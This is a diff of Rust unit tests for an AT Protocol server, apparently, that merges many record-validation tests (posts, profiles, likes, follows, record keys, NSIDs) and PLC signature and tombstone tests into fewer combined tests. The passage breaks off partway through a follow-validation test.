assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
92
93
+
let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
94
+
assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
95
+
96
+
let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com");
97
+
assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
98
+
99
+
let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com");
100
+
assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
101
}
102
103
#[test]
104
+
fn test_signature_verification() {
105
let key = SigningKey::random(&mut rand::thread_rng());
106
let did_key = signing_key_to_did_key(&key);
107
let op = json!({
108
+
"type": "plc_operation", "rotationKeys": [did_key.clone()],
109
+
"verificationMethods": {}, "alsoKnownAs": [], "services": {}, "prev": null
110
});
111
let signed = sign_operation(&op, &key).unwrap();
112
+
let result = verify_operation_signature(&signed, &[did_key.clone()]);
113
+
assert!(result.is_ok() && result.unwrap());
114
115
let other_key = SigningKey::random(&mut rand::thread_rng());
116
+
let other_did = signing_key_to_did_key(&other_key);
117
+
let result = verify_operation_signature(&signed, &[other_did]);
118
+
assert!(result.is_ok() && !result.unwrap());
119
120
+
let result = verify_operation_signature(&signed, &["not-a-did-key".to_string()]);
121
+
assert!(result.is_ok() && !result.unwrap());
122
123
+
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
124
+
assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
125
+
126
+
let invalid_base64 = json!({
127
+
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
128
+
"alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!"
129
});
130
+
assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_))));
131
}
132
133
#[test]
134
+
fn test_cid_and_key_utilities() {
135
+
let value = json!({ "alpha": 1, "beta": 2 });
136
let cid1 = cid_for_cbor(&value).unwrap();
137
let cid2 = cid_for_cbor(&value).unwrap();
138
+
assert_eq!(cid1, cid2, "CID should be deterministic");
139
+
assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256");
140
141
+
let value2 = json!({ "alpha": 999 });
142
+
let cid3 = cid_for_cbor(&value2).unwrap();
143
+
assert_ne!(cid1, cid3, "Different data should produce different CIDs");
144
145
let key = SigningKey::random(&mut rand::thread_rng());
146
+
let did = signing_key_to_did_key(&key);
147
+
assert!(did.starts_with("did:key:z") && did.len() > 50);
148
+
assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did");
149
150
let key2 = SigningKey::random(&mut rand::thread_rng());
151
+
assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids");
152
}
153
154
#[test]
155
+
fn test_tombstone_operations() {
156
+
let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" });
157
+
assert!(validate_plc_operation(&tombstone).is_ok());
158
159
let key = SigningKey::random(&mut rand::thread_rng());
160
let did_key = signing_key_to_did_key(&key);
161
let ctx = PlcValidationContext {
162
server_rotation_key: did_key.clone(),
163
expected_signing_key: did_key,
164
expected_handle: "test.handle".to_string(),
165
expected_pds_endpoint: "https://pds.example.com".to_string(),
166
};
167
+
assert!(validate_plc_operation_for_submission(&tombstone, &ctx).is_ok());
168
}
169
170
#[test]
171
+
fn test_sign_operation_and_struct() {
172
+
let key = SigningKey::random(&mut rand::thread_rng());
173
let op = json!({
174
+
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
175
+
"alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature"
176
});
177
+
let signed = sign_operation(&op, &key).unwrap();
178
+
assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature");
179
180
let mut services = HashMap::new();
181
+
services.insert("atproto_pds".to_string(), PlcService {
182
+
service_type: "AtprotoPersonalDataServer".to_string(),
183
+
endpoint: "https://pds.example.com".to_string(),
184
+
});
185
let mut verification_methods = HashMap::new();
186
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
187
let op = PlcOperation {
+129
-356
tests/record_validation.rs
+129
-356
tests/record_validation.rs
···
9
}
10
11
#[test]
12
-
fn test_validate_post_valid() {
13
let validator = RecordValidator::new();
14
-
let post = json!({
15
"$type": "app.bsky.feed.post",
16
"text": "Hello world!",
17
"createdAt": now()
18
});
19
-
let result = validator.validate(&post, "app.bsky.feed.post");
20
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
21
-
}
22
23
-
#[test]
24
-
fn test_validate_post_missing_text() {
25
-
let validator = RecordValidator::new();
26
-
let post = json!({
27
"$type": "app.bsky.feed.post",
28
"createdAt": now()
29
});
30
-
let result = validator.validate(&post, "app.bsky.feed.post");
31
-
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
32
-
}
33
34
-
#[test]
35
-
fn test_validate_post_missing_created_at() {
36
-
let validator = RecordValidator::new();
37
-
let post = json!({
38
"$type": "app.bsky.feed.post",
39
"text": "Hello"
40
});
41
-
let result = validator.validate(&post, "app.bsky.feed.post");
42
-
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
43
-
}
44
45
-
#[test]
46
-
fn test_validate_post_text_too_long() {
47
-
let validator = RecordValidator::new();
48
-
let long_text = "a".repeat(3001);
49
-
let post = json!({
50
"$type": "app.bsky.feed.post",
51
-
"text": long_text,
52
"createdAt": now()
53
});
54
-
let result = validator.validate(&post, "app.bsky.feed.post");
55
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
56
-
}
57
58
-
#[test]
59
-
fn test_validate_post_text_at_limit() {
60
-
let validator = RecordValidator::new();
61
-
let limit_text = "a".repeat(3000);
62
-
let post = json!({
63
"$type": "app.bsky.feed.post",
64
-
"text": limit_text,
65
"createdAt": now()
66
});
67
-
let result = validator.validate(&post, "app.bsky.feed.post");
68
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
69
-
}
70
71
-
#[test]
72
-
fn test_validate_post_too_many_langs() {
73
-
let validator = RecordValidator::new();
74
-
let post = json!({
75
"$type": "app.bsky.feed.post",
76
"text": "Hello",
77
"createdAt": now(),
78
"langs": ["en", "fr", "de", "es"]
79
});
80
-
let result = validator.validate(&post, "app.bsky.feed.post");
81
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
82
-
}
83
84
-
#[test]
85
-
fn test_validate_post_three_langs_ok() {
86
-
let validator = RecordValidator::new();
87
-
let post = json!({
88
"$type": "app.bsky.feed.post",
89
"text": "Hello",
90
"createdAt": now(),
91
"langs": ["en", "fr", "de"]
92
});
93
-
let result = validator.validate(&post, "app.bsky.feed.post");
94
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
95
-
}
96
97
-
#[test]
98
-
fn test_validate_post_too_many_tags() {
99
-
let validator = RecordValidator::new();
100
-
let post = json!({
101
"$type": "app.bsky.feed.post",
102
"text": "Hello",
103
"createdAt": now(),
104
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
105
});
106
-
let result = validator.validate(&post, "app.bsky.feed.post");
107
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
108
-
}
109
110
-
#[test]
111
-
fn test_validate_post_eight_tags_ok() {
112
-
let validator = RecordValidator::new();
113
-
let post = json!({
114
"$type": "app.bsky.feed.post",
115
"text": "Hello",
116
"createdAt": now(),
117
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
118
});
119
-
let result = validator.validate(&post, "app.bsky.feed.post");
120
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
121
-
}
122
123
-
#[test]
124
-
fn test_validate_post_tag_too_long() {
125
-
let validator = RecordValidator::new();
126
-
let long_tag = "t".repeat(641);
127
-
let post = json!({
128
"$type": "app.bsky.feed.post",
129
"text": "Hello",
130
"createdAt": now(),
131
-
"tags": [long_tag]
132
});
133
-
let result = validator.validate(&post, "app.bsky.feed.post");
134
-
assert!(
135
-
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))
136
-
);
137
}
138
139
#[test]
140
-
fn test_validate_profile_valid() {
141
let validator = RecordValidator::new();
142
-
let profile = json!({
143
"$type": "app.bsky.actor.profile",
144
"displayName": "Test User",
145
"description": "A test user profile"
146
});
147
-
let result = validator.validate(&profile, "app.bsky.actor.profile");
148
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
149
-
}
150
151
-
#[test]
152
-
fn test_validate_profile_empty_ok() {
153
-
let validator = RecordValidator::new();
154
-
let profile = json!({
155
"$type": "app.bsky.actor.profile"
156
});
157
-
let result = validator.validate(&profile, "app.bsky.actor.profile");
158
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
159
-
}
160
161
-
#[test]
162
-
fn test_validate_profile_displayname_too_long() {
163
-
let validator = RecordValidator::new();
164
-
let long_name = "n".repeat(641);
165
-
let profile = json!({
166
"$type": "app.bsky.actor.profile",
167
-
"displayName": long_name
168
});
169
-
let result = validator.validate(&profile, "app.bsky.actor.profile");
170
-
assert!(
171
-
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
172
-
);
173
-
}
174
175
-
#[test]
176
-
fn test_validate_profile_description_too_long() {
177
-
let validator = RecordValidator::new();
178
-
let long_desc = "d".repeat(2561);
179
-
let profile = json!({
180
"$type": "app.bsky.actor.profile",
181
-
"description": long_desc
182
});
183
-
let result = validator.validate(&profile, "app.bsky.actor.profile");
184
-
assert!(
185
-
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")
186
-
);
187
}
188
189
#[test]
190
-
fn test_validate_like_valid() {
191
let validator = RecordValidator::new();
192
-
let like = json!({
193
"$type": "app.bsky.feed.like",
194
"subject": {
195
"uri": "at://did:plc:test/app.bsky.feed.post/123",
···
197
},
198
"createdAt": now()
199
});
200
-
let result = validator.validate(&like, "app.bsky.feed.like");
201
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
202
-
}
203
204
-
#[test]
205
-
fn test_validate_like_missing_subject() {
206
-
let validator = RecordValidator::new();
207
-
let like = json!({
208
"$type": "app.bsky.feed.like",
209
"createdAt": now()
210
});
211
-
let result = validator.validate(&like, "app.bsky.feed.like");
212
-
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
213
-
}
214
215
-
#[test]
216
-
fn test_validate_like_missing_subject_uri() {
217
-
let validator = RecordValidator::new();
218
-
let like = json!({
219
"$type": "app.bsky.feed.like",
220
"subject": {
221
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
222
},
223
"createdAt": now()
224
});
225
-
let result = validator.validate(&like, "app.bsky.feed.like");
226
-
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
227
-
}
228
229
-
#[test]
230
-
fn test_validate_like_invalid_subject_uri() {
231
-
let validator = RecordValidator::new();
232
-
let like = json!({
233
"$type": "app.bsky.feed.like",
234
"subject": {
235
"uri": "https://example.com/not-at-uri",
···
237
},
238
"createdAt": now()
239
});
240
-
let result = validator.validate(&like, "app.bsky.feed.like");
241
-
assert!(
242
-
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))
243
-
);
244
-
}
245
246
-
#[test]
247
-
fn test_validate_repost_valid() {
248
-
let validator = RecordValidator::new();
249
-
let repost = json!({
250
"$type": "app.bsky.feed.repost",
251
"subject": {
252
"uri": "at://did:plc:test/app.bsky.feed.post/123",
···
254
},
255
"createdAt": now()
256
});
257
-
let result = validator.validate(&repost, "app.bsky.feed.repost");
258
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
259
-
}
260
261
-
#[test]
262
-
fn test_validate_repost_missing_subject() {
263
-
let validator = RecordValidator::new();
264
-
let repost = json!({
265
"$type": "app.bsky.feed.repost",
266
"createdAt": now()
267
});
268
-
let result = validator.validate(&repost, "app.bsky.feed.repost");
269
-
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
270
}
271
272
#[test]
273
-
fn test_validate_follow_valid() {
274
let validator = RecordValidator::new();
275
-
let follow = json!({
276
"$type": "app.bsky.graph.follow",
277
"subject": "did:plc:test12345",
278
"createdAt": now()
279
});
280
-
let result = validator.validate(&follow, "app.bsky.graph.follow");
281
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
282
-
}
283
284
-
#[test]
285
-
fn test_validate_follow_missing_subject() {
286
-
let validator = RecordValidator::new();
287
-
let follow = json!({
288
"$type": "app.bsky.graph.follow",
289
"createdAt": now()
290
});
291
-
let result = validator.validate(&follow, "app.bsky.graph.follow");
292
-
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
293
-
}
294
295
-
#[test]
296
-
fn test_validate_follow_invalid_subject() {
297
-
let validator = RecordValidator::new();
298
-
let follow = json!({
299
"$type": "app.bsky.graph.follow",
300
"subject": "not-a-did",
301
"createdAt": now()
302
});
303
-
let result = validator.validate(&follow, "app.bsky.graph.follow");
304
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
305
-
}
306
307
-
#[test]
308
-
fn test_validate_block_valid() {
309
-
let validator = RecordValidator::new();
310
-
let block = json!({
311
"$type": "app.bsky.graph.block",
312
"subject": "did:plc:blocked123",
313
"createdAt": now()
314
});
315
-
let result = validator.validate(&block, "app.bsky.graph.block");
316
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
317
-
}
318
319
-
#[test]
320
-
fn test_validate_block_invalid_subject() {
321
-
let validator = RecordValidator::new();
322
-
let block = json!({
323
"$type": "app.bsky.graph.block",
324
"subject": "not-a-did",
325
"createdAt": now()
326
});
327
-
let result = validator.validate(&block, "app.bsky.graph.block");
328
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
329
}
330
331
#[test]
332
-
fn test_validate_list_valid() {
333
let validator = RecordValidator::new();
334
-
let list = json!({
335
"$type": "app.bsky.graph.list",
336
"name": "My List",
337
"purpose": "app.bsky.graph.defs#modlist",
338
"createdAt": now()
339
});
340
-
let result = validator.validate(&list, "app.bsky.graph.list");
341
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
342
-
}
343
344
-
#[test]
345
-
fn test_validate_list_name_too_long() {
346
-
let validator = RecordValidator::new();
347
-
let long_name = "n".repeat(65);
348
-
let list = json!({
349
"$type": "app.bsky.graph.list",
350
-
"name": long_name,
351
"purpose": "app.bsky.graph.defs#modlist",
352
"createdAt": now()
353
});
354
-
let result = validator.validate(&list, "app.bsky.graph.list");
355
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
356
-
}
357
358
-
#[test]
359
-
fn test_validate_list_empty_name() {
360
-
let validator = RecordValidator::new();
361
-
let list = json!({
362
"$type": "app.bsky.graph.list",
363
"name": "",
364
"purpose": "app.bsky.graph.defs#modlist",
365
"createdAt": now()
366
});
367
-
let result = validator.validate(&list, "app.bsky.graph.list");
368
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
369
}
370
371
#[test]
372
-
fn test_validate_feed_generator_valid() {
373
let validator = RecordValidator::new();
374
-
let generator = json!({
375
"$type": "app.bsky.feed.generator",
376
"did": "did:web:example.com",
377
"displayName": "My Feed",
378
"createdAt": now()
379
});
380
-
let result = validator.validate(&generator, "app.bsky.feed.generator");
381
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
382
-
}
383
384
-
#[test]
385
-
fn test_validate_feed_generator_displayname_too_long() {
386
-
let validator = RecordValidator::new();
387
-
let long_name = "f".repeat(241);
388
-
let generator = json!({
389
"$type": "app.bsky.feed.generator",
390
"did": "did:web:example.com",
391
-
"displayName": long_name,
392
"createdAt": now()
393
});
394
-
let result = validator.validate(&generator, "app.bsky.feed.generator");
395
-
assert!(
396
-
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
397
-
);
398
-
}
399
400
-
#[test]
401
-
fn test_validate_unknown_type_returns_unknown() {
402
-
let validator = RecordValidator::new();
403
-
let custom = json!({
404
-
"$type": "com.custom.record",
405
-
"data": "test"
406
});
407
-
let result = validator.validate(&custom, "com.custom.record");
408
-
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
409
}
410
411
#[test]
412
-
fn test_validate_unknown_type_strict_rejects() {
413
-
let validator = RecordValidator::new().require_lexicon(true);
414
-
let custom = json!({
415
"$type": "com.custom.record",
416
"data": "test"
417
});
418
-
let result = validator.validate(&custom, "com.custom.record");
419
-
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
420
-
}
421
422
-
#[test]
423
-
fn test_validate_type_mismatch() {
424
-
let validator = RecordValidator::new();
425
-
let record = json!({
426
"$type": "app.bsky.feed.like",
427
"subject": {"uri": "at://test", "cid": "bafytest"},
428
"createdAt": now()
429
});
430
-
let result = validator.validate(&record, "app.bsky.feed.post");
431
-
assert!(
432
-
matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
433
-
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")
434
-
);
435
-
}
436
437
-
#[test]
438
-
fn test_validate_missing_type() {
439
-
let validator = RecordValidator::new();
440
-
let record = json!({
441
"text": "Hello"
442
});
443
-
let result = validator.validate(&record, "app.bsky.feed.post");
444
-
assert!(matches!(result, Err(ValidationError::MissingType)));
445
-
}
446
447
-
#[test]
448
-
fn test_validate_not_object() {
449
-
let validator = RecordValidator::new();
450
-
let record = json!("just a string");
451
-
let result = validator.validate(&record, "app.bsky.feed.post");
452
-
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
453
-
}
454
455
-
#[test]
456
-
fn test_validate_datetime_format_valid() {
457
-
let validator = RecordValidator::new();
458
-
let post = json!({
459
"$type": "app.bsky.feed.post",
460
"text": "Test",
461
"createdAt": "2024-01-15T10:30:00.000Z"
462
});
463
-
let result = validator.validate(&post, "app.bsky.feed.post");
464
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
465
-
}
466
467
-
#[test]
468
-
fn test_validate_datetime_with_offset() {
469
-
let validator = RecordValidator::new();
470
-
let post = json!({
471
"$type": "app.bsky.feed.post",
472
"text": "Test",
473
"createdAt": "2024-01-15T10:30:00+05:30"
474
});
475
-
let result = validator.validate(&post, "app.bsky.feed.post");
476
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
477
-
}
478
479
-
#[test]
480
-
fn test_validate_datetime_invalid_format() {
481
-
let validator = RecordValidator::new();
482
-
let post = json!({
483
"$type": "app.bsky.feed.post",
484
"text": "Test",
485
"createdAt": "2024/01/15"
486
});
487
-
let result = validator.validate(&post, "app.bsky.feed.post");
488
-
assert!(matches!(
489
-
result,
490
-
Err(ValidationError::InvalidDatetime { .. })
491
-
));
492
}
493
494
#[test]
495
-
fn test_validate_record_key_valid() {
496
assert!(validate_record_key("3k2n5j2").is_ok());
497
assert!(validate_record_key("valid-key").is_ok());
498
assert!(validate_record_key("valid_key").is_ok());
499
assert!(validate_record_key("valid.key").is_ok());
500
assert!(validate_record_key("valid~key").is_ok());
501
assert!(validate_record_key("self").is_ok());
502
-
}
503
504
-
#[test]
505
-
fn test_validate_record_key_empty() {
506
-
let result = validate_record_key("");
507
-
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
508
-
}
509
510
-
#[test]
511
-
fn test_validate_record_key_dot() {
512
assert!(validate_record_key(".").is_err());
513
assert!(validate_record_key("..").is_err());
514
-
}
515
516
-
#[test]
517
-
fn test_validate_record_key_invalid_chars() {
518
assert!(validate_record_key("invalid/key").is_err());
519
assert!(validate_record_key("invalid key").is_err());
520
assert!(validate_record_key("invalid@key").is_err());
521
assert!(validate_record_key("invalid#key").is_err());
522
-
}
523
524
-
#[test]
525
-
fn test_validate_record_key_too_long() {
526
-
let long_key = "k".repeat(513);
527
-
let result = validate_record_key(&long_key);
528
-
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
529
}
530
531
#[test]
532
-
fn test_validate_record_key_at_max_length() {
533
-
let max_key = "k".repeat(512);
534
-
assert!(validate_record_key(&max_key).is_ok());
535
-
}
536
-
537
-
#[test]
538
-
fn test_validate_collection_nsid_valid() {
539
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
540
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
541
assert!(validate_collection_nsid("a.b.c").is_ok());
542
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
543
-
}
544
545
-
#[test]
546
-
fn test_validate_collection_nsid_empty() {
547
-
let result = validate_collection_nsid("");
548
-
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
549
-
}
550
551
-
#[test]
552
-
fn test_validate_collection_nsid_too_few_segments() {
553
assert!(validate_collection_nsid("a").is_err());
554
assert!(validate_collection_nsid("a.b").is_err());
555
-
}
556
557
-
#[test]
558
-
fn test_validate_collection_nsid_empty_segment() {
559
assert!(validate_collection_nsid("a..b.c").is_err());
560
assert!(validate_collection_nsid(".a.b.c").is_err());
561
assert!(validate_collection_nsid("a.b.c.").is_err());
562
-
}
563
564
-
#[test]
565
-
fn test_validate_collection_nsid_invalid_chars() {
566
assert!(validate_collection_nsid("a.b.c/d").is_err());
567
assert!(validate_collection_nsid("a.b.c_d").is_err());
568
assert!(validate_collection_nsid("a.b.c@d").is_err());
569
}
570
-
571
-
#[test]
572
-
fn test_validate_threadgate() {
573
-
let validator = RecordValidator::new();
574
-
let gate = json!({
575
-
"$type": "app.bsky.feed.threadgate",
576
-
"post": "at://did:plc:test/app.bsky.feed.post/123",
577
-
"createdAt": now()
578
-
});
579
-
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
580
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
581
-
}
582
-
583
-
#[test]
584
-
fn test_validate_labeler_service() {
585
-
let validator = RecordValidator::new();
586
-
let labeler = json!({
587
-
"$type": "app.bsky.labeler.service",
588
-
"policies": {
589
-
"labelValues": ["spam", "nsfw"]
590
-
},
591
-
"createdAt": now()
592
-
});
593
-
let result = validator.validate(&labeler, "app.bsky.labeler.service");
594
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
595
-
}
596
-
597
-
#[test]
598
-
fn test_validate_list_item() {
599
-
let validator = RecordValidator::new();
600
-
let item = json!({
601
-
"$type": "app.bsky.graph.listitem",
602
-
"subject": "did:plc:test123",
603
-
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
604
-
"createdAt": now()
605
-
});
606
-
let result = validator.validate(&item, "app.bsky.graph.listitem");
607
-
assert_eq!(result.unwrap(), ValidationStatus::Valid);
608
-
}
···
9
}
10
11
#[test]
12
+
fn test_post_record_validation() {
13
let validator = RecordValidator::new();
14
+
15
+
let valid_post = json!({
16
"$type": "app.bsky.feed.post",
17
"text": "Hello world!",
18
"createdAt": now()
19
});
20
+
assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
21
22
+
let missing_text = json!({
23
"$type": "app.bsky.feed.post",
24
"createdAt": now()
25
});
26
+
assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text"));
27
28
+
let missing_created_at = json!({
29
"$type": "app.bsky.feed.post",
30
"text": "Hello"
31
});
32
+
assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt"));
33
34
+
let text_too_long = json!({
35
"$type": "app.bsky.feed.post",
36
+
"text": "a".repeat(3001),
37
"createdAt": now()
38
});
39
+
assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text"));
40
41
+
let text_at_limit = json!({
42
"$type": "app.bsky.feed.post",
43
+
"text": "a".repeat(3000),
44
"createdAt": now()
45
});
46
+
assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
47
48
+
let too_many_langs = json!({
49
"$type": "app.bsky.feed.post",
50
"text": "Hello",
51
"createdAt": now(),
52
"langs": ["en", "fr", "de", "es"]
53
});
54
+
assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
55
56
+
let three_langs_ok = json!({
57
"$type": "app.bsky.feed.post",
58
"text": "Hello",
59
"createdAt": now(),
60
"langs": ["en", "fr", "de"]
61
});
62
+
assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
63
64
+
let too_many_tags = json!({
65
"$type": "app.bsky.feed.post",
66
"text": "Hello",
67
"createdAt": now(),
68
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
69
});
70
+
assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
71
72
+
let eight_tags_ok = json!({
73
"$type": "app.bsky.feed.post",
74
"text": "Hello",
75
"createdAt": now(),
76
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
77
});
78
+
assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
79
80
+
let tag_too_long = json!({
81
"$type": "app.bsky.feed.post",
82
"text": "Hello",
83
"createdAt": now(),
84
+
"tags": ["t".repeat(641)]
85
});
86
+
assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
87
}
88
89
#[test]
90
+
fn test_profile_record_validation() {
91
let validator = RecordValidator::new();
92
+
93
+
let valid = json!({
94
"$type": "app.bsky.actor.profile",
95
"displayName": "Test User",
96
"description": "A test user profile"
97
});
98
+
assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
99
100
+
let empty_ok = json!({
101
"$type": "app.bsky.actor.profile"
102
});
103
+
assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
104
105
+
let displayname_too_long = json!({
106
"$type": "app.bsky.actor.profile",
107
+
"displayName": "n".repeat(641)
108
});
109
+
assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
110
111
+
let description_too_long = json!({
112
"$type": "app.bsky.actor.profile",
113
+
"description": "d".repeat(2561)
114
});
115
+
assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description"));
116
}
117
118
#[test]
119
+
fn test_like_and_repost_validation() {
120
let validator = RecordValidator::new();
121
+
122
+
let valid_like = json!({
123
"$type": "app.bsky.feed.like",
124
"subject": {
125
"uri": "at://did:plc:test/app.bsky.feed.post/123",
···
127
},
128
"createdAt": now()
129
});
130
+
assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid);
131
132
+
let missing_subject = json!({
133
"$type": "app.bsky.feed.like",
134
"createdAt": now()
135
});
136
+
assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject"));
137
138
+
let missing_subject_uri = json!({
139
"$type": "app.bsky.feed.like",
140
"subject": {
141
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
142
},
143
"createdAt": now()
144
});
145
+
assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri")));
146
147
+
let invalid_subject_uri = json!({
148
"$type": "app.bsky.feed.like",
149
"subject": {
150
"uri": "https://example.com/not-at-uri",
···
152
},
153
"createdAt": now()
154
});
155
+
assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
156
157
+
let valid_repost = json!({
158
"$type": "app.bsky.feed.repost",
159
"subject": {
160
"uri": "at://did:plc:test/app.bsky.feed.post/123",
···
162
},
163
"createdAt": now()
164
});
165
+
assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid);
166
167
+
let repost_missing_subject = json!({
168
"$type": "app.bsky.feed.repost",
169
"createdAt": now()
170
});
171
+
assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject"));
172
}
173
174
#[test]
175
+
fn test_follow_and_block_validation() {
176
let validator = RecordValidator::new();
177
+
178
+
let valid_follow = json!({
179
"$type": "app.bsky.graph.follow",
180
"subject": "did:plc:test12345",
181
"createdAt": now()
182
});
183
+
assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid);
184
185
+
let missing_follow_subject = json!({
186
"$type": "app.bsky.graph.follow",
187
"createdAt": now()
188
});
189
+
assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject"));
190
191
+
let invalid_follow_subject = json!({
192
"$type": "app.bsky.graph.follow",
193
"subject": "not-a-did",
194
"createdAt": now()
195
});
196
+
